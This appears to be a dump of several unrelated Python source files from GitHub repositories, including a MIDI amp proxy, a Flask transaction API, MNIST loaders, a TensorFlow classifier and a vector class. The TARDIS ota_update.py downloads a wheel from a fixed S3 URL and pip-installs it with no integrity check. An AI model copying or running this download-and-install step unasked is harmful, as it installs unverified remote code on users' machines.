hex(first_hex)[2:] # always a single digit\n second_hex = hex(second_hex)[2:].zfill(2) # might be one or two digits\n checksum = hex(checksum)[2:].zfill(2)\n\n sysex_cmd = sysex_cmds[tap_str].format(\n first_hex, second_hex, checksum)\n return event.SysExEvent(ev.port, sysex_cmd)\n\ndef get_checksum(values):\n accum = 0\n for val in values:\n accum = (accum + val) & 127\n return (128-accum) & 127\n\n\ndef process_query_result(ev):\n \"\"\"\n Process SysEx data coming from the Katana.\n \"\"\"\n hex_bytes = ' '.join('{:02x}'.format(x) for x in ev.sysex)\n # print(\"SysEx event rec'd: {}\".format(hex_bytes))\n\n # extract the starting address and an unknown number of data bytes\n start_address = hex_bytes[24:35]\n data_bytes = hex_bytes[36:-6].split()\n\n address = None\n address_int = None\n last_addr_byte = None\n\n # iterate through the bytes and check each address\n for data_byte in data_bytes:\n if not address:\n # initialize\n address = start_address\n last_addr_byte = address[-2:]\n else:\n # increment hex str representation.\n if last_addr_byte != \"7f\":\n # increment the last byte by 1\n last_addr_byte = format(int(last_addr_byte,16)+1, '02x')\n address = \"{}{}\".format(address[:-2], last_addr_byte)\n else:\n # rolls over, need to increment the upper address byte\n last_addr_byte = \"00\"\n upper_addr_byte = address[-5:-3]\n upper_addr_byte = format(int(upper_addr_byte,16)+1, '02x')\n address = \"{}{} {}\".format(\n address[:-5], upper_addr_byte, last_addr_byte)\n\n # see if this byte matches a known setting address\n setting_name = addresses.get(address)\n if not setting_name:\n # no match, ignore it\n continue\n\n # update amp state\n if setting_name.endswith(\"color\") or setting_name.endswith(\"on\"):\n # print(\"Match: \" + setting_name)\n amp_state[setting_name] = int(data_byte)\n elif setting_name == \"patch_selected\":\n # print(\"Match: patch_selected\")\n patch = int(data_bytes[-1], 16)\n amp_state[\"patch_selected\"] = patch\n if patch <= 4:\n amp_state[\"bank\"] = 0\n else:\n amp_state[\"bank\"] = 127\n\ndef init():\n \"\"\"\n Send SysEx command queries to initialize our state.\n \"\"\"\n time.sleep(2) # wait for the engine to initialize\n ports = engine.out_ports()\n port = ports[0]\n cmds = [\n PREFIX + \" 12 7f 00 00 01 01 7f f7\", # put into verbose mode\n PREFIX + \" 11 00 01 00 00 00 00 00 02 7d f7\", # get patch number\n PREFIX + \" 11 60 00 06 39 00 00 00 05 5c f7\", # get effect colors\n PREFIX + \" 11 00 00 00 2e 00 00 00 01 51 f7\", # get global eq color\n ]\n for cmd in cmds:\n engine.output_event(\n event.SysExEvent(\n port, cmd)\n )\n\nstart_new_thread(init, ())\n\nrun(\n # CC messages for various toggles, option cycling, and delay taps\n [Filter(CTRL) >> CtrlSplit({\n 20: Process(toggle_effect, \"reverb_on\"),\n 21: Process(toggle_effect, \"delay2_on\"),\n 22: Process(toggle_effect, \"pedal_fx_on\"),\n 23: Process(toggle_amp_bank),\n\n 96: CtrlValueFilter(127) >> Process(next_color, \"boost_color\"),\n 97: CtrlValueFilter(127) >> Process(next_color, \"mod_color\"),\n 98: CtrlValueFilter(127) >> Process(next_color, \"fx_color\"),\n 99: CtrlValueFilter(127) >> Process(delay_tap, \"delay1_tap\"),\n 100: CtrlValueFilter(127) >> Process(next_color, \"reverb_color\"),\n 101: CtrlValueFilter(127) >> Process(delay_tap, \"delay2_tap\"),\n\n 102: Process(toggle_effect, \"preamp_solo_on\"),\n\n 103: CtrlValueFilter(127) >> Process(next_color, \"global_eq_color\"),\n\n None: Pass(),\n }),\n ProgramFilter([1, 2, 3, 4]) >> Process(select_amp),\n # SysEx messages are query results back from the amp\n SysExFilter(manufacturer=0x41) >> Call(process_query_result),\n SysExFilter(\"\\xf0\\x7e\") >> Call(process_query_result),\n ]\n )\n","repo_name":"rafrombrc/katana_midi_proxy","sub_path":"katana_midi_proxy.py","file_name":"katana_midi_proxy.py","file_ext":"py","file_size_in_byte":10763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17615385953","text":"__doc__='''\n\nClean up the maintenance window catalog after moving to notification\nsubscriptions.\n\n'''\nimport Migrate\n\nclass MigrateWindowCatalog(Migrate.Step):\n version = Migrate.Version(4, 0, 1)\n\n def cutover(self, dmd):\n catalog = dmd.maintenanceWindowSearch\n paths = set()\n for b in catalog():\n path = b.getPath()\n if path.startswith('/zport/dmd/ZenUsers'):\n paths.add(path)\n for path in paths:\n catalog.uncatalog_object(path)\n\nMigrateWindowCatalog()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/migrate/migrateWindowCatalog.py","file_name":"migrateWindowCatalog.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"72641127874","text":"import functools\nfrom decimal import Decimal\n\nfrom flask import Blueprint, request, jsonify, g\nfrom mongoengine import DoesNotExist, MultipleObjectsReturned\n\nfrom utair.models import User, Transaction\n\nimport dateutil\n\nfrom utair.utils import json_ok, json_error\n\nbp = Blueprint('user', __name__, url_prefix='/user')\n\nPAGE_SIZE = 10\n\n\ndef token_required(view):\n \"\"\"Decorator that check for user token is GET arguments.\"\"\"\n\n @functools.wraps(view)\n def wrapped(**kwargs):\n token = None\n\n if request.method == 'GET':\n token = request.args.get('token')\n elif request.method == 'POST':\n if 'token' in request.form:\n token = request.form['token']\n\n if token is None:\n return json_error('Token not found in request')\n\n return view(**kwargs)\n\n return wrapped\n\n\ndef load_user_by_token(view):\n \"\"\"Decorator that load user object from the database\n in to ``g.user`` by token.\"\"\"\n\n @functools.wraps(view)\n def wrapped(**kwargs):\n token = request.args.get('token')\n\n try:\n user = User.objects(token=token).get()\n except DoesNotExist:\n return json_error('User not found')\n except MultipleObjectsReturned as e:\n # Shouldn't be possible, because token is unique\n raise e\n\n g.user = user\n\n return view(**kwargs)\n\n return wrapped\n\n\n@bp.route('/info', methods=['GET'])\n@load_user_by_token\n@token_required\ndef user_info():\n user = g.user\n\n total_bonus = Transaction.objects(card_id=user.card_id).sum('bonus')\n\n return json_ok({\n 'user': {\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'patronymic': user.patronymic,\n 'email': user.email,\n 'card_id': user.card_id,\n 'total_bonus': total_bonus\n }\n })\n\n\ndef add_param(params, arg, key=None, type=None, converter=None):\n \"\"\"Adds parameter to params map.\n Supports: custom key\n custom type\n converting param before assignment\"\"\"\n if key is None:\n key = arg\n if type is None:\n type = str\n\n param = request.args.get(arg, type=type)\n\n if param is not None:\n if converter is None:\n params[key] = param\n else:\n params[key] = converter(param)\n\n\n@bp.route('/transactions', methods=['GET'])\n@load_user_by_token\n@token_required\ndef user_transactions():\n \"\"\"Lets user see his transactions, supports:\n pagination (page param)\n filtering: from (place)\n to (place)\n before (date)\n after (date)\n transaction_ids\n less (bonus)\n more (bonus)\"\"\"\n card_id = g.user.card_id\n\n page = request.args.get('page', default=1, type=int)\n # page is number from 1 to ...\n page = max(1, page)\n\n params = {'card_id': card_id}\n\n add_param(params, 'from', 'from_place')\n\n add_param(params, 'to', 'to_place')\n\n # must treat this differently, because its list (always not None)\n transaction_ids = request.args.getlist('id', type=int)\n\n if len(transaction_ids) > 0:\n params['transaction_id__in'] = transaction_ids\n\n add_param(params, 'before', 'date__lte', converter=dateutil.parser.parse)\n\n add_param(params, 'after', 'date__gte', converter=dateutil.parser.parse)\n\n # bonus more than\n add_param(params, 'more', 'bonus__gte', type=Decimal)\n\n # bonus less than\n add_param(params, 'less', 'bonus__lte', type=Decimal)\n\n transactions = Transaction.objects(**params).paginate(page=page, per_page=PAGE_SIZE)\n\n # list of jsoninied transactions\n trans_json = []\n\n for transaction in transactions.items:\n trans_json.append({\n 'transaction_id': transaction.transaction_id,\n 'card_id': transaction.card_id,\n 'bonus': float(transaction.bonus),\n 'from': transaction.from_place,\n 'to': transaction.to_place,\n 'date': transaction.date\n })\n\n return json_ok({'transactions': trans_json})\n","repo_name":"Kolaer/utair","sub_path":"utair/blueprints/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10335858592","text":"import json\nimport numpy as np\nimport os\nimport struct\nfrom array import array as pyarray\nimport pickle\n\ndef load_synth_data(dataset_name, base_folder='data'):\n \"\"\"\n This function loads the synthesized data provided in a picke file in the\n /data directory.\n \"\"\"\n\n data_path = os.path.join(base_folder, dataset_name)\n\n with open(data_path, 'rb') as handle:\n data = pickle.load(handle)\n\n trainX = data['trainX']\n trainY = data['trainY']\n\n return trainX, trainY\n\n\ndef load_mnist_data(threshold, fraction=1.0, examples_per_class=500, mnist_folder='data'):\n \"\"\"\n Loads a subset of the MNIST dataset.\n\n Arguments:\n threshold - (int) One greater than the maximum digit in the selected\n subset. For example to get digits [0, 1, 2] this arg should be 3, or\n to get the digits [0, 1, 2, 3, 4, 5, 6] this arg should be 7.\n fraction - (float) Value between 0.0 and 1.0 representing the fraction\n of data to include in the training set. The remaining data is\n included in the test set. Unused if dataset == 'synthetic'.\n examples_per_class - (int) Number of examples to retrieve in each\n class.\n mnist_folder - (string) Path to folder containing MNIST binary files.\n\n Returns:\n train_features - (np.array) An Nxd array of features, where N is the\n number of examples and d is the number of features.\n test_features - (np.array) An Nxd array of features, where M is the\n number of examples and d is the number of features.\n train_targets - (np.array) A 1D array of targets of size N.\n test_targets - (np.array) A 1D array of targets of size M.\n \"\"\"\n assert 0.0 <= fraction <= 1.0, 'Whoopsies! Incorrect value for fraction :P'\n\n train_examples = int(examples_per_class * fraction)\n if train_examples == 0:\n train_features, train_targets = np.array([[]]), np.array([])\n else:\n train_features, train_targets = _load_mnist(\n dataset='training', digits=range(threshold), path=mnist_folder)\n train_features, train_targets = stratified_subset(\n train_features, train_targets, train_examples)\n train_features = train_features.reshape((len(train_features), -1))\n\n test_examples = examples_per_class - train_examples\n if test_examples == 0:\n test_features, test_targets = np.array([[]]), np.array([])\n else:\n test_features, test_targets = _load_mnist(\n dataset='testing', digits=range(threshold), path=mnist_folder)\n test_features, test_targets = stratified_subset(\n test_features, test_targets, test_examples)\n test_features = test_features.reshape((len(test_features), -1))\n\n return train_features, test_features, train_targets, test_targets\n\n\ndef _load_mnist(path, dataset=\"training\", digits=None, asbytes=False,\n selection=None, return_labels=True, return_indices=False):\n \"\"\"\n Loads MNIST files into a 3D numpy array. Does not automatically download\n the dataset. You must download the dataset manually. The data can be\n downloaded from http://yann.lecun.com/exdb/mnist/.\n\n Examples:\n 1) Assuming that you have downloaded the MNIST database in a directory\n called 'data', this will load all images and labels from the training\n set:\n\n images, labels = _load_mnist('training')\n\n 2) And this will load 100 sevens from the test partition:\n\n sevens = _load_mnist('testing', digits=[7], selection=slice(0, 100),\n return_labels=False)\n\n Arguments:\n path - (str) Path to your MNIST datafiles.\n dataset - (str) Either \"training\" or \"testing\". The data partition to\n load.\n digits - (list or None) A list of integers specifying the digits to\n load. If None, the entire database is loaded.\n asbytes - (bool) If True, returns data as ``numpy.uint8`` in [0, 255]\n as opposed to ``numpy.float64`` in [0.0, 1.0].\n selection - (slice) Using a `slice` object, specify what subset of the\n dataset to load. An example is ``slice(0, 20, 2)``, which would\n load every other digit until--but not including--the twentieth.\n return_labels - (bool) Specify whether or not labels should be\n returned. This is also a speed performance if digits are not\n specified, since then the labels file does not need to be read at\n all.\n return_indicies - (bool) Specify whether or not to return the MNIST\n indices that were fetched. This is valuable only if digits is\n specified, because in that case it can be valuable to know how far\n in the database it reached.\n Returns:\n images - (np.array) Image data of shape ``(N, rows, cols)``, where\n ``N`` is the number of images. If neither labels nor indices are\n returned, then this is returned directly, and not inside a 1-sized\n tuple.\n labels - (np.array) Array of size ``N`` describing the labels.\n Returned only if ``return_labels`` is `True`, which is default.\n indices - (np.array) The indices in the database that were returned.\n \"\"\"\n\n # The files are assumed to have these names and should be found in 'path'\n files = {\n 'training': ('train-images-idx3-ubyte', 'train-labels-idx1-ubyte'),\n 'testing': ('t10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte'),\n }\n\n try:\n images_fname = os.path.join(path, files[dataset][0])\n labels_fname = os.path.join(path, files[dataset][1])\n except KeyError:\n raise ValueError(\"Data set must be 'testing' or 'training'\")\n\n # We can skip the labels file only if digits aren't specified and labels\n # aren't asked for\n if return_labels or digits is not None:\n flbl = open(labels_fname, 'rb')\n magic_nr, size = struct.unpack(\">II\", flbl.read(8))\n labels_raw = pyarray(\"b\", flbl.read())\n flbl.close()\n\n fimg = open(images_fname, 'rb')\n magic_nr, size, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n images_raw = pyarray(\"B\", fimg.read())\n fimg.close()\n\n if digits:\n indices = [k for k in range(size) if labels_raw[k] in digits]\n else:\n indices = range(size)\n\n if selection:\n indices = indices[selection]\n\n images = np.zeros((len(indices), rows, cols), dtype=np.uint8)\n\n if return_labels:\n labels = np.zeros((len(indices)), dtype=np.int8)\n for i in range(len(indices)):\n images[i] = np.array(images_raw[indices[i] * rows * cols:(indices[i] + 1) * rows * cols]).reshape((rows, cols))\n if return_labels:\n labels[i] = labels_raw[indices[i]]\n\n if not asbytes:\n images = images.astype(float)/255.0\n\n ret = (images,)\n if return_labels:\n ret += (labels,)\n if return_indices:\n ret += (indices,)\n\n if len(ret) == 1:\n return ret[0] # Don't return a tuple of one\n\n return ret\n\n\ndef stratified_subset(features, targets, examples_per_class):\n \"\"\"\n Evenly sample the dataset across unique classes. Requires each unique class\n to have at least examples_per_class examples.\n\n Arguments:\n features - (np.array) An Nxd array of features, where N is the\n number of examples and d is the number of features.\n targets - (np.array) A 1D array of targets of size N.\n examples_per_class - (int) The number of examples to take in each\n unique class.\n Returns:\n train_features - (np.array) An Nxd array of features, where N is the\n number of examples and d is the number of features.\n test_features - (np.array) An Nxd array of features, where M is the\n number of examples and d is the number of features.\n train_targets - (np.array) A 1D array of targets of size N.\n test_targets - (np.array) A 1D array of targets of size M.\n \"\"\"\n idxs = np.array([False] * len(features))\n for target in np.unique(targets):\n idxs[np.where(targets == target)[0][:examples_per_class]] = True\n return features[idxs], targets[idxs]\n","repo_name":"jagilley/skl-reimplementation","sub_path":"neural-networks/data/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71313379393","text":"#######################################################################\n# TARDIS - Transformer And Rapid Dimensionless Instance Segmentation #\n# #\n# New York Structural Biology Center #\n# Simons Machine Learning Center #\n# #\n# Robert Kiewisz, Tristan Bepler #\n# MIT License 2021 - 2023 #\n#######################################################################\n\nimport json\nfrom os import mkdir\nfrom os.path import expanduser, join, isdir, isfile\nimport subprocess\nimport requests\nfrom tardis_em.utils.logo import TardisLogo\n\nfrom tardis_em.utils.aws import aws_check_pkg_with_temp\nimport sys\nimport time\n\n\ndef ota_update(status=False):\n if not isdir(join(expanduser(\"~\"), \".tardis_em\")):\n mkdir(join(expanduser(\"~\"), \".tardis_em\"))\n\n timestamp = time.time()\n if isfile(\n join(\n expanduser(\"~\"),\n \".tardis_em\",\n \"last_check.json\",\n )\n ):\n try:\n save = json.load(\n open(\n join(\n expanduser(\"~\"),\n \".tardis_em\",\n \"last_check.json\",\n )\n )\n )[\"timestamp\"]\n except:\n save = time.time()\n with open(\n join(join(expanduser(\"~\"), \".tardis_em\"), \"last_check.json\"), \"w\"\n ) as f:\n json.dump({\"timestamp\": timestamp}, f)\n\n if timestamp - save > 86400:\n # Check OTA-Update\n ota_status = aws_check_pkg_with_temp()\n else:\n ota_status = True\n else:\n # Check OTA-Update\n ota_status = aws_check_pkg_with_temp()\n\n if status:\n if not ota_status:\n return \"New version is available\"\n else:\n return \"\"\n else:\n if not ota_status:\n main_logo = TardisLogo()\n main_logo(\n title=\"| Transforms And Rapid Dimensionless Instance Segmentation\",\n text_0=\"TARDIS_pytorch has new update available via OTA-Update!\",\n text_1=\"Please in run this command to update tardis\",\n text_3=\"tardis_ota\",\n text_5=\"Contact developers if segmentation of your organelle is not supported!\",\n text_6=\"rkiewisz@nysbc.org | tbepler@nysbc.org\",\n text_8=\"Join Slack community: https://tardis-em.slack.com\",\n )\n time.sleep(10)\n with open(\n join(join(expanduser(\"~\"), \".tardis_em\"), \"last_check.json\"), \"w\"\n ) as f:\n json.dump({\"timestamp\": timestamp}, f)\n\n\ndef main():\n if not isdir(join(expanduser(\"~\"), \".tardis_em\")):\n mkdir(join(expanduser(\"~\"), \".tardis_em\"))\n\n # Download OTA-Update\n try:\n py_pkg = requests.get(\n \"https://tardis-weigths.s3.dualstack.us-east-1.amazonaws.com/\"\n \"tardis_em/tardis_em-x.x.x-py3-none-any.whl\",\n timeout=(5, None),\n )\n except:\n return \"OTA-Up-to-Data\"\n\n # Save OTA-Update\n with open(\n join(expanduser(\"~\"), \".tardis_em/tardis_em-x.x.x-py3-none-any.whl\"),\n \"wb\",\n ) as f:\n f.write(py_pkg.content)\n\n with open(join(expanduser(\"~\"), \".tardis_em/pkg_header.json\"), \"w\") as f:\n json.dump(dict(py_pkg.headers), f)\n\n # Installed, uninstall old package version\n # Make sure to remove legacy files\n try:\n subprocess.run([\"pip\", \"uninstall\", \"-y\", \"tardis-pytorch\"])\n except:\n pass\n\n subprocess.run([\"pip\", \"uninstall\", \"-y\", \"tardis_em\"])\n\n subprocess.run(\n [\n \"pip\",\n \"install\",\n join(\n expanduser(\"~\"),\n \".tardis_em/\" \"tardis_em-x.x.x-py3-none-any.whl\",\n ),\n ]\n )\n\n main_logo = TardisLogo()\n main_logo(\n title=\"| Transforms And Rapid Dimensionless Instance Segmentation\",\n text_0=\"TARDIS_pytorch was updated via OTA-Update!\",\n text_1=\"Please restart your previous operation.\",\n text_3=\"(rkiewisz@nysbc.org | tbepler@nysbc.org).\",\n text_4=\"Join Slack community: https://tardis-em.slack.com\",\n text_6=\"FUNCTIONALITY:\",\n text_7=\"To predict microtubule and filament instances:\",\n text_8=\" tardis_mt --help\",\n text_10=\"To predict membrane semantic and instances:\",\n text_11=\" tardis_mem --help |OR| tardis_mem2d --help\",\n )\n sys.exit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SMLC-NYSBC/TARDIS","sub_path":"tardis_em/utils/ota_update.py","file_name":"ota_update.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11752076215","text":"import tensorflow as tf\nfrom skimage import transform\nfrom skimage import data\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nfrom skimage.color import rgb2gray\nimport random\nimport pandas as pd\n# Import `tensorflow`\nimport tensorflow as tf\n\n\ndef load_data(data_dir):\n # Get all subdirectories of data_dir. Each represents a label.\n directories = [d for d in os.listdir(data_dir)\n if os.path.isdir(os.path.join(data_dir, d))]\n # Loop through the label directories and collect the data in\n # two lists, labels and images.\n labels = []\n images = []\n for d in directories:\n label_dir = os.path.join(data_dir, d)\n file_names = [os.path.join(label_dir, f)\n for f in os.listdir(label_dir)\n if f.endswith(\".jpg\")]\n for f in file_names:\n images.append(data.imread(f))\n labels.append(int(d))\n return images, labels\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer('num_classes', 3, 'Number of classes.')\nflags.DEFINE_integer('num_variables', 784, 'Number of variables.')\n\n# Hyper Parameters\nflags.DEFINE_integer('hidden1', 256, 'Number of units in hidden layer 1.')\nflags.DEFINE_integer('hidden2', 128, 'Number of units in hidden layer 2.')\nflags.DEFINE_integer('num_epochs', 50, 'Number of learning epochs.')\nflags.DEFINE_integer('batch_size', 10, 'Batch size.')\nflags.DEFINE_float('keep_prob', 0.5, 'Keep probability for drop out.')\nflags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')\n\ndef inference(data, data_size, keep_prob):\n # # Hidden layer 1\n # with tf.name_scope('hidden1'):\n # weights = tf.Variable(tf.truncated_normal([data_size, FLAGS.hidden1],\n # stddev=1.0 / math.sqrt(float(data_size))), name='weights1')\n # biases = tf.Variable(tf.zeros([FLAGS.hidden1]), name='biases1')\n # hidden1 = tf.nn.relu(tf.matmul(data, weights) + biases)\n #\n # # Dropout before layer 2\n # hidden1_drop = tf.nn.dropout(hidden1, keep_prob, name='layer1_dropout')\n #\n # # Hidden layer 2\n # with tf.name_scope('hidden2'):\n # weights = tf.Variable(tf.truncated_normal([FLAGS.hidden1, FLAGS.hidden2],\n # stddev=1.0 / math.sqrt(float(FLAGS.hidden1))), name='weights2')\n # biases = tf.Variable(tf.zeros([FLAGS.hidden2]), name='biases2')\n # hidden2 = tf.nn.sigmoid(tf.matmul(hidden1_drop, weights) + biases)\n #\n # # Dropout before linear reading out\n # hidden2_drop = tf.nn.dropout(hidden2, keep_prob, name='layer2_dropout')\n #\n # # Read out\n # with tf.name_scope('softmax_linear'):\n # weights = tf.Variable(tf.truncated_normal([FLAGS.hidden2, FLAGS.num_classes],\n # stddev=1.0 / math.sqrt(float(FLAGS.hidden2))), name='weights')\n # biases = tf.Variable(tf.zeros([FLAGS.num_classes]), name='biases')\n # logits = tf.matmul(hidden2_drop, weights) + biases\n\n weights = tf.Variable(tf.zeros([data_size, FLAGS.num_classes]), name='weights')\n biases = tf.Variable(tf.zeros([FLAGS.num_classes]), name='biases')\n logits = tf.matmul(data, weights) + biases\n\n return logits\n\ndef loss(logits, labels):\n labels = tf.to_int64(labels)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels, name='xentropy')\n vars = tf.trainable_variables()\n reg = tf.add_n([tf.nn.l2_loss(v) for v in vars])*0.01\n# reg = 0.01*(tf.nn.l2_loss(w) + tf.nn.l2_loss(b))\n loss = tf.reduce_mean(cross_entropy, name='xentropy_mean') + reg\n return loss\n\ndef training(loss):\n tf.summary.scalar(loss.op.name, loss)\n optimizer = tf.train.AdamOptimizer(FLAGS.learning_rate)\n global_step = tf.Variable(0, name='global_step', trainable=False)\n train_op = optimizer.minimize(loss, global_step=global_step)\n return train_op\n\ndef evaluation(logits, labels):\n correct = tf.nn.in_top_k(logits, labels, 1)\n return tf.reduce_sum(tf.cast(correct, tf.int32))\n\ndef shuffle_data(data, labels):\n # transform list into DataFrame\n new_df = pd.DataFrame(data)\n new_df['__labels__'] = labels\n new_df = new_df.reindex(np.random.permutation(new_df.index))\n\n new_labels = list(new_df['__labels__'])\n del new_df['__labels__']\n\n # transform DataFrame into list\n new_row = []\n for index, row in new_df.iterrows():\n _list_row = []\n for col in new_df:\n _list_row.append(row[col])\n new_row.append(_list_row)\n\n return new_row, new_labels\n\ndef run_training(data, labels):\n # Tell TensorFlow that the model will be built into the default Graph.\n with tf.Graph().as_default():\n data_size = FLAGS.num_variables\n num_classes = FLAGS.num_classes\n\n data_placeholder = tf.placeholder(\"float\", shape=(None, data_size))\n labels_placeholder = tf.placeholder(\"int32\", shape=None)\n keep_prob = tf.placeholder(\"float\")\n\n # Build a Graph that computes predictions from the inference model.\n logits = inference(data_placeholder, data_size, keep_prob)\n\n correct_pred = tf.argmax(logits, 1)\n\n # Add to the Graph the loss calculation.\n loss_op = loss(logits, labels_placeholder)\n\n # Add to the Graph operations that train the model.\n train_op = training(loss_op)\n\n # Add the Op to compare the logits to the labels during evaluation.\n eval_correct = evaluation(logits, labels_placeholder)\n\n # Build the summary Tensor based on the TF collection of Summaries.\n summary = tf.summary.merge_all()\n\n # The op for initializing the variables.\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n # check point\n saver = tf.train.Saver()\n\n # Create a session for running operations in the Graph.\n sess = tf.Session()\n\n # Instantiate a SummaryWriter to output summaries and the Graph.\n summary_writer = tf.summary.FileWriter('.', sess.graph)\n\n # Initialize the variables (the trained variables and the epoch counter).\n sess.run(init_op)\n\n # training\n for epoch in range(FLAGS.num_epochs):\n for i in range(int(len(data)/FLAGS.batch_size)):\n batch = FLAGS.batch_size*i\n sess.run(train_op, feed_dict={\n data_placeholder: data[batch:batch + FLAGS.batch_size],\n labels_placeholder: labels[batch:batch + FLAGS.batch_size],\n keep_prob: FLAGS.keep_prob})\n\n # calculate accuracy in every epoch\n actual_loss, train_accuracy = sess.run([loss_op, eval_correct], feed_dict={\n data_placeholder: data,\n labels_placeholder: labels,\n keep_prob: FLAGS.keep_prob})\n print(\"epoch %d, loss %g, acc %g\" % (epoch, actual_loss, train_accuracy / len(labels)))\n\n # update TensorBoard\n summary_str = sess.run(summary, feed_dict={\n data_placeholder: data,\n labels_placeholder: labels,\n keep_prob: 1.0})\n summary_writer.add_summary(summary_str, epoch)\n\n # shuffling data for next epoch\n data, labels = shuffle_data(data, labels)\n\n # Save a checkpoint and evaluate the model periodically.\n # Create a saver for writing training checkpoints.\n path = saver.save(sess, '/home/hguan/project/machine-learning/garage/models.ckpt')\n print('checkpoint is saved at ' + path)\n\n sess.close()\n\ndef run_classifier(data):\n with tf.Graph().as_default():\n data_size = FLAGS.num_variables\n num_classes = FLAGS.num_classes\n data_placeholder = tf.placeholder(\"float\", shape=(None, data_size))\n\n logits = inference(data_placeholder, data_size, 1.0)\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n sess = tf.Session()\n sess.run(init_op)\n\n saver = tf.train.Saver()\n saver.restore(sess, '/home/hguan/project/machine-learning/garage/models.ckpt')\n\n prediction_list = []\n total = len(data)\n with sess.as_default():\n for i in range(total):\n print('#%d : ' % i, end='')\n v = logits.eval(feed_dict={data_placeholder: [data[i]]})\n sm = tf.nn.softmax(v)\n smv = sm.eval()\n# prediction_list.append(smv[0])\n\n cls = np.argmax(smv) # get the class number with largest value by argmax\n prediction_list.append(cls)\n print('prediction=%d (%f)' % (cls, smv[0][cls]))\n\n return prediction_list\n\ndef test_data():\n # Testing data\n images, labels = load_data(test_data_dir)\n images_array = np.array(images)\n labels_array = np.array(labels)\n\n # Resize images\n images32 = [transform.resize(image, (28, 28)) for image in images]\n images32 = np.array(images32)\n images32 = rgb2gray(np.array(images32))\n images32 = images32.reshape(-1, 784)\n return images, images32, labels\n\n\nROOT_PATH = \"/home/hguan/project/machine-learning/garage/\"\ntrain_data_dir = os.path.join(ROOT_PATH, \"training\")\ntest_data_dir = os.path.join(ROOT_PATH, \"testing\")\n\n# Training data\nimages, labels = load_data(train_data_dir+\"/0\")\nimages_array = np.array(images)\nlabels_array = np.array(labels)\n\n# Resize images\nimages32 = [transform.resize(image, (28, 28)) for image in images]\nimages32c = np.array(images32)\nimages32 = rgb2gray(np.array(images32c))\nimages32 = images32.reshape(-1, 784)\n\n#run_training(images32, labels)\n\nimages, images32, labels = test_data()\npredicted = run_classifier(images32)\n\n# Print the real and predicted labels\nprint(labels)\nprint(predicted)\npred_name = [\"\", \"Nissan\", \"BMW\"]\n# Display the predictions and the ground truth visually.\nfig = plt.figure(figsize=(32, 32))\nfor i in range(len(images32)):\n print('i=', i)\n truth = labels[i]\n prediction = predicted[i]\n plt.subplot(10, 6,1+i)\n plt.axis('off')\n color='green' if truth == prediction else 'red'\n plt.text(700, 300, \"Truth: {0}\\nPrediction: {1}\".format(truth, pred_name[prediction]),\n fontsize=6, color=color)\n plt.imshow(images[i])\n\nplt.show()\n","repo_name":"lakemang/garage","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":10395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71097483396","text":"from cube2common.vec import vec\n\nR = [1, 2, 0]\nC = [2, 0, 1]\nD = [0, 1, 2]\n\nclass ivec(object):\n def __init__(self, *args):\n self.v = [0]*3\n \n if len(args) == 1 and isinstance(args[0], vec):\n v = args[0]\n \n self.x = v.x\n self.y = v.y\n self.z = v.z\n \n elif len(args) == 1:\n i = args[0]\n \n self.x = ((i&1)>>0)\n self.y = ((i&2)>>1)\n self.z = ((i&4)>>2)\n \n elif len(args) == 3:\n self.v = args\n \n elif len(args) == 4:\n d, row, col, depth = args\n \n self.v[R[d]] = row;\n self.v[C[d]] = col;\n self.v[D[d]] = depth;\n \n elif len(args) == 5:\n i, cx, cy, cz, size = args\n \n self.x = cx+((i&1)>>0)*size;\n self.y = cy+((i&2)>>1)*size;\n self.z = cz+((i&4)>>2)*size;\n \n def __repr__(self):\n return \"\".format(x=self.x, y=self.y, z=self.z)\n \n def copy(self):\n return vec(self.x, self.y, self.z)\n \n def __eq__(self, other):\n if isinstance(other, ivec):\n return self.x == other.x and self.y == other.y and self.z == other.z\n else:\n return False\n \n def __ne__(self, other):\n if isinstance(other, ivec):\n return self.x != other.x or self.y != other.y or self.z != other.z\n else:\n return False\n \n def __getitem__(self, index):\n return self.v[index]\n \n def __setitem__(self, index, value):\n self.v[index] = value\n \n @property\n def x(self):\n return self.v[0]\n \n @x.setter\n def x(self, value):\n self.v[0] = value\n \n @property\n def y(self):\n return self.v[1]\n \n @y.setter\n def y(self, value):\n self.v[1] = value\n \n @property\n def z(self):\n return self.v[2]\n \n @z.setter\n def z(self, value):\n self.v[2] = value\n \n @property\n def r(self):\n return self.v[0]\n \n @r.setter\n def r(self, value):\n self.v[0] = value\n \n @property\n def g(self):\n return self.v[1]\n \n @g.setter\n def g(self, value):\n self.v[1] = value\n \n @property\n def b(self):\n return self.v[2]\n \n @b.setter\n def b(self, value):\n self.v[2] = value\n \n def iszero(self):\n return self.x == 0 and self.y == 0 and self.z == 0\n \n def shl(self, n):\n self.x <<= n\n self.y <<= n\n self.z <<= n\n \n def shr(self, n):\n self.x >>= n\n self.y >>= n\n self.z >>= n\n \n def mul(self, item):\n if isinstance(item, ivec):\n self.x *= item.x\n self.y *= item.y\n self.z *= item.z\n else:\n self.x *= item\n self.y *= item\n self.z *= item\n return self\n \n def div(self, item):\n 